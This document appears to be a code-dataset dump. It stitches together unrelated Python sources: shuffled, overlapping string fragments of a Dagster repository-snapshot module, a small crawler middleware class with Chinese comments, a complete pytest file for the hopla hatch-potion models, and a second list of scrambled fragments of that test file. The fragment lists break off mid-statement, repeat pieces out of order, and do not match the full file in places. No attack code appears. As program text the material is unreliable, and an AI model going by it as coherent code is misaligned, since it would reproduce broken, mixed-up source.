"'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not",
"repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot))",
"False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name ==",
"self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot',",
"dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot',",
"(pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def",
"self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for",
"in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class",
"@staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name,",
"= OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return",
"in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self):",
"PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param(",
"PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot =",
"import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot",
"repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots",
"class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name,",
"import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class",
"RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def",
") self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self,",
"for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found')",
"def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name",
"pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for",
"def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name:",
"return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name",
"def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots',",
"namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes",
"from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import"
] |
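A minimal usage sketch, not from the source: given a RepositoryDefinition built elsewhere (here the hypothetical stand-in `repo_def`), RepositoryIndex.from_repository_def snapshots every pipeline in the repository and exposes a name-indexed map. Only APIs defined in the module above are used.

def pipeline_names(repo_def):
    # Build the index, then read the pipeline names back out of the
    # underlying RepositorySnapshot.
    index = RepositoryIndex.from_repository_def(repo_def)
    snapshot = index.repository_snapshot
    return [pipeline.name for pipeline in snapshot.get_all_pipeline_snapshots()]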
# Downloader middleware module: pre-processes request and response data.
class SpiderMiddleware(object):
    def process_request(self, request):
        # Handles a request: called before the request object is handed to the engine.
        print("SpiderMiddleware-process_request-{}".format(request.url))
        return request

    def process_response(self, response):
        # Handles response data: called before the response object is handed to the spider.
        print("SpiderMiddleware-process_response-{}".format(response.url))
        return response
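A minimal driver sketch, not part of the original module, showing how an engine loop might invoke the two hooks. `Request` and `Response` are hypothetical stand-ins for the framework's own request/response objects.

class Request:
    def __init__(self, url):
        self.url = url


class Response:
    def __init__(self, url):
        self.url = url


if __name__ == "__main__":
    # Each hook logs the URL it sees and returns the (possibly modified) object.
    middleware = SpiderMiddleware()
    request = middleware.process_request(Request("http://example.com"))
    response = middleware.process_response(Response("http://example.com"))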
#!/usr/bin/env python3
# rickie/hopla: src/tests/hoplalib/hatchery/test_hatchpotionmodels.py
import random
from typing import List

import click
import pytest

from hopla.hoplalib.errors import YouFoundABugRewardError
from hopla.hoplalib.hatchery.hatchdata import HatchPotionData
from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \
    HatchPotionException

_SAMPLE_SIZE = 10


class TestHatchPotion:
    def test__init__invalid_name_fail(self):
        name = "InvalidName"
        with pytest.raises(HatchPotionException) as exec_info:
            HatchPotion(name, quantity=1)

        assert str(exec_info.value).startswith(f"{name} is not a valid hatching potion name.")
        assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))

    @pytest.mark.parametrize(
        "potion_name,quantity",
        list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),
                 range(-_SAMPLE_SIZE, 0)))
    )
    def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int):
        with pytest.raises(HatchPotionException) as exec_info:
            HatchPotion(potion_name, quantity=quantity)

        assert str(exec_info.value).startswith(f"{quantity} is below 0.")
        assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))

    @pytest.mark.parametrize(
        "potion_name,quantity",
        list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),
                 range(0, _SAMPLE_SIZE)))
    )
    def test__repr__ok(self, potion_name: str, quantity: int):
        potion = HatchPotion(potion_name, quantity=quantity)

        result: str = repr(potion)

        assert result == f"HatchPotion({potion_name}: {quantity})"

    def test__eq__(self):
        assert HatchPotion("Red") == HatchPotion("Red")
        assert HatchPotion("Shimmer", quantity=1) == HatchPotion("Shimmer")
        assert HatchPotion("Silver") != HatchPotion("Silver", quantity=2)
        assert HatchPotion("Watery") != HatchPotion("Glow")

    @pytest.mark.parametrize("potion_name,quantity", [
        ("Base", 10),
        ("CottonCandyBlue", 1),
        ("Golden", 0),
    ])
    def test_is_standard_potion(self, potion_name: str, quantity: int):
        potion = HatchPotion(potion_name, quantity=quantity)

        assert potion.is_standard_hatch_potion() is True
        assert potion.is_magic_hatch_potion() is False
        assert potion.is_wacky_hatch_potion() is False

    @pytest.mark.parametrize("potion_name,quantity", [
        ("BirchBark", 10),
        ("Windup", 1),
        ("Vampire", 0),
        ("Ruby", 9),
        ("Amber", 69),
        ("MossyStone", 42),
        ("SolarSystem", 9001),
    ])
    def test_is_magic_potion(self, potion_name: str, quantity: int):
        potion = HatchPotion(potion_name, quantity=quantity)

        assert potion.is_standard_hatch_potion() is False
        assert potion.is_magic_hatch_potion() is True
        assert potion.is_wacky_hatch_potion() is False

    @pytest.mark.parametrize("potion_name,quantity", [
        ("Veggie", 10),
        ("Dessert", 0),
    ])
    def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int):
        potion = HatchPotion(potion_name, quantity=quantity)

        assert potion.is_standard_hatch_potion() is False
        assert potion.is_magic_hatch_potion() is False
        assert potion.is_wacky_hatch_potion() is True


class TestHatchPotionCollection:
    def test__init__empty_ok(self):
        collection = HatchPotionCollection()
        assert collection == HatchPotionCollection({})
        assert len(collection) == 0

    def test__init__ok(self):
        potion_dict = {"Base": 0, "Moonglow": 42, "Sunset": 2}

        collection = HatchPotionCollection(potion_dict)

        assert collection["Base"] == HatchPotion("Base", quantity=0)
        assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42)
        assert collection["Sunset"] == HatchPotion("Sunset", quantity=2)

    def test__eq__ok(self):
        left = HatchPotionCollection({"Frost": 1, "Glow": 1})
        right = HatchPotionCollection({"Glow": 1, "Frost": 2})
        assert left != right

        assert HatchPotionCollection() == HatchPotionCollection()
        assert HatchPotionCollection({"StarryNight": 1}) != HatchPotionCollection()
        assert HatchPotionCollection({"Windup": 2}) == HatchPotionCollection({"Windup": 2})
        assert HatchPotionCollection({"Frost": 1}) != HatchPotionCollection({"Frost": 2})

    def test__iter__ok(self):
        collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 2})

        iterator = iter(collection)

        assert next(iterator) == "Base"
        assert next(iterator) == "Moonglow"
        assert next(iterator) == "Sunset"
        with pytest.raises(StopIteration):
            next(iterator)

    def test__getitem__ok(self):
        collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 0})

        assert collection["Base"] == HatchPotion("Base", quantity=1)
        assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42)
        assert collection["Sunset"] == HatchPotion("Sunset", quantity=0)

    def test_values_ok(self):
        potion1, quantity1 = "Dessert", 10
        potion2, quantity2 = "MossyStone", 1
        potion3, quantity3 = "StainedGlass", 2
        collection = HatchPotionCollection({
            potion1: quantity1, potion2: quantity2, potion3: quantity3
        })

        generator = collection.values()

        assert next(generator) == HatchPotion(potion1, quantity=quantity1)
        assert next(generator) == HatchPotion(potion2, quantity=quantity2)
        assert next(generator) == HatchPotion(potion3, quantity=quantity3)
        with pytest.raises(StopIteration):
            _ = next(generator)

    def test_values_as_list_ok(self):
        potion1, quantity1 = "Golden", 1
        potion2, quantity2 = "Sunshine", 41
        potion3, quantity3 = "Vampire", 3
        collection = HatchPotionCollection({
            potion1: quantity1, potion2: quantity2, potion3: quantity3
        })

        result: List[HatchPotion] = list(collection.values())

        expected: List[HatchPotion] = [
            HatchPotion(potion1, quantity=quantity1),
            HatchPotion(potion2, quantity=quantity2),
            HatchPotion(potion3, quantity=quantity3)
        ]
        assert result == expected

    def test_remove_hatch_potion_ok(self):
        potion1_quantity = 3
        potion2_quantity = 42
        potion3_name, potion3_quantity = "Sunset", 1
        collection = HatchPotionCollection({
            "Base": potion1_quantity,
            "Moonglow": potion2_quantity,
            potion3_name: potion3_quantity
        })

        collection.remove_hatch_potion(HatchPotion("Base"))
        collection.remove_hatch_potion(HatchPotion("Moonglow"))
        collection.remove_hatch_potion(HatchPotion(potion3_name))

        assert collection["Base"] == HatchPotion("Base", quantity=potion1_quantity - 1)
        assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=potion2_quantity - 1)
        assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1)

    def test_remove_hatch_potion_not_available_fail(self):
        collection = HatchPotionCollection({"Base": 1})

        not_found_potion_name = "Moonglow"
        with pytest.raises(HatchPotionException) as exec_info:
            collection.remove_hatch_potion(HatchPotion(not_found_potion_name))

        expected_msg = f"{not_found_potion_name} was not in the collection "
        assert str(exec_info.value).startswith(expected_msg)
"from typing import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from",
"HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\",",
"test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\",",
"test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity}",
"exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str,",
"TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) ==",
"assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1,",
"potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity,",
"3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion]",
"HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity =",
"HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"]",
"with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError,",
"2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\",",
"next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41",
"= \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3",
"result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\")",
"HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\"",
"= {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] ==",
"int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False",
"is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\",",
"1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right",
"potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity -",
"HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2)",
"with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the collection",
"quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3",
"\"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid",
"name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self,",
"== HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\":",
"collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right",
"= HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) ==",
"def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str =",
"HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left !=",
"quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\",",
"collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42)",
"9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert",
"quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity",
"test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion)",
"quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0),",
"\\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with",
"pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the collection \"",
"9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity:",
"hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self):",
"collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1)",
"= HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert",
"def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\")",
"assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) ==",
"@pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str,",
"HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\",",
"{\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\",",
"potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [",
"collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left =",
"== HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3)",
"= collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert",
"== HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator)",
"test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection",
"False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self):",
"quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\")",
"assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] ==",
"quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection",
"quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert",
"42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42)",
"False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69),",
"42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"]",
"\"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2:",
"== HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\":",
"\"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator",
"= 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info:",
"= HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion()",
"quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1",
"list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion =",
"1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def",
"python3 import random from typing import List import click import pytest from hopla.hoplalib.errors",
"quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3",
"collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values()",
"HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is",
"collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator)",
"\"Frost\": 2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1})",
"0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self,",
"class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection)",
"quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1:",
"potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity",
"is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ])",
"_SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result:",
"assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with",
"\"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the",
"= \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 })",
"quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),",
"potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion]",
"name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not",
"def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name}",
"potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection ==",
"(\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int):",
"HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException)",
"HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError,",
"potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"]",
"1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity",
"1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as",
"2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) !=",
"potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({",
"True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert",
"HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\",",
"HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self):",
"quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is",
"not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not",
"10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001),",
"assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name:",
"potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0),",
"\"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection",
"quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10",
